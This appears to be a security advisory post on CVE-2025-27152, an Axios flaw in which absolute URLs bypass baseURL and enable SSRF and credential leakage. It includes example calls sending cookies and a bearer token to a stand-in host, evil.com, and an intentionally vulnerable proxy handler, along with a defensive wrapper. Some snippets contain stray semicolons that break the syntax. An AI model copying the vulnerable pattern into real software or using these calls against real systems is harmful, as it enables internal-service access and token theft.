CVE CyberSecurity Database News

CVE-2025-27152 - Critical SSRF and Credential Leakage in Axios via Absolute URL Handling

Poster -

Axios is one of the most popular HTTP clients for JavaScript, widely used across both browser and Node.js environments. It’s often praised for its simplicity and promise-based workflow, making API calls easy and maintainable. However, the discovery of CVE-2025-27152 brings to light a critical security weakness, especially for developers who rely on Axios' baseURL configuration to keep their HTTP requests in check.

This long-read post breaks down the vulnerability, gives practical examples with code snippets, and details both its risks and how you can fix or mitigate the issue. All content herein is original and tailored to help you quickly grasp and address the security challenge.

What is CVE-2025-27152 About?

The vulnerability arises because Axios does not verify or restrict requests sent to absolute URLs – even if you have set a baseURL. This can allow attackers to craft requests that ignore your intended API endpoint entirely, potentially resulting in Server-Side Request Forgery (SSRF) or credential leakage scenarios.

Why is it Dangerous?

- SSRF (Server-Side Request Forgery): Attackers could trick your backend into making requests to internal infrastructure, cloud metadata endpoints, or malicious external addresses.
- Credential Leakage: If your Axios requests automatically include cookies or HTTP authentication headers (via withCredentials or default options), those sensitive tokens could be sent to a hostile server.

How Axios URL Resolution Works

Axios lets you set a baseURL, and typically, API calls are made using *relative paths* (like /users). Axios then joins the baseURL and the path to form the final URL. But if someone passes in an *absolute URL* (one starting with http:// or https://), Axios will use it as-is, completely ignoring baseURL.

Example

const axios = require('axios');

const api = axios.create({
  baseURL: 'https://api.example.com/';,
  withCredentials: true,  // Automatically sends cookies
});

// Safe usage: relative path uses baseURL
api.get('/users') // -> https://api.example.com/users

// DANGEROUS: absolute URL completely bypasses baseURL!
api.get('https://evil.com/steal';) // -> https://evil.com/steal

It’s easy to see how this could be exploited if the provided path isn't fully trusted or validated.

Imagine you have a simple proxy endpoint designed to fetch user-supplied URLs

// A typical proxy handler using Axios (DANGEROUS!)
app.get('/proxy', async (req, res) => {
  const path = req.query.url; // From user input
  try {
    const response = await api.get(path); // api includes baseURL!
    res.json(response.data);
  } catch (err) {
    res.status(500).send('Failed');
  }
});

Attack scenario: An attacker sends GET /proxy?url=http://internal.service.local/admin, allowing requests to internal-only (or restricted) services.

2. Credential Leakage Example

If your Axios instance is configured with withCredentials: true or global authentication headers, those will be sent to any absolute URL—even external or malicious ones.

const api = axios.create({
  baseURL: 'https://yourservice.com/';,
  withCredentials: true,
  headers: { Authorization: 'Bearer supersecrettoken' }
});

// If attacker controls the URL:
api.get('https://evil.com/steal';) 
// Authorization header and cookies are sent to evil.com!

Upgrade to Axios version 1.8.2 or later!

- Axios Release Notes

If you cannot upgrade immediately, here is a defensive wrapper

function safeAxiosGet(apiInstance, path) {
  // Only allow relative paths!
  // Protocol-relative URLs start with //, block those too.
  if (/^https?:\/\//i.test(path) || /^\/\//.test(path)) {
    throw new Error('Absolute URLs are not allowed!');
  }
  return apiInstance.get(path);
}

// Usage
try {
  safeAxiosGet(api, req.query.url);
} catch (e) {
  res.status(400).send('Bad request.');
}

Best Practice: Always validate and sanitize user input, and restrict outgoing requests to trusted domains—especially when proxies or backends act as “requestors” on behalf of users.

Further Reading

- Original Axios Issue #5377
- Axios Security Advisories
- Node.js: Dangers of SSRF
- Credential Leakage Risks

Conclusion

CVE-2025-27152 is a classic example of how small convenience features can sometimes have outsized security impacts. If you rely on Axios, especially in a Node.js backend, upgrade now and review all code where user input might determine a request path. Don’t trust client-provided URLs, avoid passing absolute URLs to Axios, and always validate user input!

Timeline

Published on: 03/07/2025 16:15:38 UTC
Last modified on: 03/07/2025 20:15:38 UTC